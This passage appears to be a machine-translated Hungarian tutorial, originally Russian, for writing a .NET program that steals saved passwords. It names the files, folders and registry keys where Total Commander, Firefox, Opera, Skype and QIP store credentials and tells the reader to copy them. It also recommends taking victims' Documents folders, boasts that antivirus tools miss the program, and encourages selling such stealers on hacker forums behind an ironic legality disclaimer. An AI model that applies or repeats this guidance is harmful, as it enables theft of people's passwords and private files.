A TC sok más programmal ellentétben nem tárolja a jelszavakat a rendszerleíró adatbázisban, hanem a jó öreg ini fájlokat használja. Jelszavak, valamint a szerverekhez való csatlakozáshoz szükséges összes adat (ip, port, felhasználónév stb.) Total Commander fájlban tárolja wcx_ftp.ini, amely ártatlanul a program mappájában található. A telepítési könyvtár elérési útja Total Commander, megtudhatja a nyilvántartásból. Keresse meg a HKEY_CURRENT_USER\Software\Ghisler\Total Commander ágat.
firefox
A böngésző ma már nem csupán egy WEB-es utazáshoz használható program, hanem egy egész kombájn, amely a különféle lehetőségek mellett rengeteg bizalmas információt tárol. Tipikus példa erre a webes űrlapok. A modern webhelyek 99%-a regisztrációhoz kötött. Az egyes webhelyek bejelentkezési / jelszó kombinációjának emlékezése és állandó szem előtt tartása irreális feladat, különösen, ha Ön haladó felhasználó, és az interneten való böngészés nem korlátozódik az Odnoklassnikire és a VKontakte-ra.
A fejlesztők megkönnyítették a felhasználók életét, és beépítették a programokba az úgynevezett "jelszótárolókat". Regisztráltam, bejelentkeztem a fiókom alatt, megparancsoltam a böngészőnek, hogy emlékezzen a hitelesítő adatokra – és elfelejtettem. Amikor legközelebb meglátogatja, nem kell mást tennie, mint néhány egérkattintással, és máris az oldalon van. Mivel a böngésző elmenti a jelszavakat, ez azt jelenti, hogy lehetőségünk van ellopni a teljes adatbázisát.
Mindezek a fájlok a jól ismert Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% mappában találhatók.
Opera
Opera- egy böngésző, amely nagyon népszerű az orosz felhasználók körében. Természetesen nem hagyhatjuk felügyelet nélkül. Tehát az Opera esetében nagyjából ugyanaz a helyzet, mint a FireFoxnál. A böngészőben mentett összes jelszó a wand.dat fájl Document and Settings\%UserName%\Application Data\Opera\profile mappájában tárolódik. Kiderült, hogy az Opera észlelésekor ugyanúgy járunk el, mint az esetében firefox.
Skype
A Skype népszerűsége napról napra nő. Sokan nem hívások kezdeményezésére használják, hanem egy banális kényelmes csevegésre. Minden bizalmas adat a várakozásoknak megfelelően a felhasználói profilban található (azon a helyen, ahol az Opera vagy az FF tárolja azokat). A „privatizáláshoz” át kell másolnia a felhasználói profilt a Document and Settings\%userName%\Application Data\Skype\ mappából, és exportálnia kell a rendszerleíró ágat - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage.
QIP
A legtöbb korábban leírt programhoz hasonlóan a QIP az összes mentett jelszót az Application Data\qip mappában tárolja.
A másolás befejeződött
A .NET technológia nagymértékben leegyszerűsítette a dolgunkat, aminek következtében minden kódolás néhány metódus meghívására redukálódott. Persze lehet mondani, hogy ez nem menő, és az ilyen dolgokat sokkal hatékonyabban lehet írni WinAPI-ban vagy ASM-ben. , írj ilyen programot de nem fogsz gyorsan sikerülni.Míg mások kilométeres kódot írnak addig te meg én szüretelünk.Sok sikert a programozáshoz és ha kérdésed van írj a szappannak.
Ne felejtse el, hogy sok felhasználó bizalmas információkat tárol a „Dokumentumok” mappában. Legalább érdekes munkadokumentumok lehetnek, és néha teljes fájlok jelszavakkal. Egy időben (volt munkahelyemen) találtam a könyvelő gépén egy szépen formázott fájlt a banki ügyfelek jelszavaival.
Igaz barátként segítenie kell ezeknek az embereknek az érzékeny információik biztonsági mentését.
Sok hacker fórumon sok hirdetés található az ilyen szoftverek eladásáról. Különböző árak - 10 dollártól 100 dollárig. A cikkben tárgyalt példák véglegesítése után fekete kenyérhéjat kereshet kaviárral. Ismétlem, a lényeg az, hogy kreatívan közelítsd meg a dolgot, és minden biztosan sikerülni fog. Ismétlem, az antivírusok nem észlelik;).
Figyelem!
Ezt a programot kizárólag a flash meghajtók tartalmának lemezre mentésére és a jelszavak flash meghajtóra történő mentésére használjuk. És mit gondoltál? Az ilyen szoftverek illegális használata büntetendő!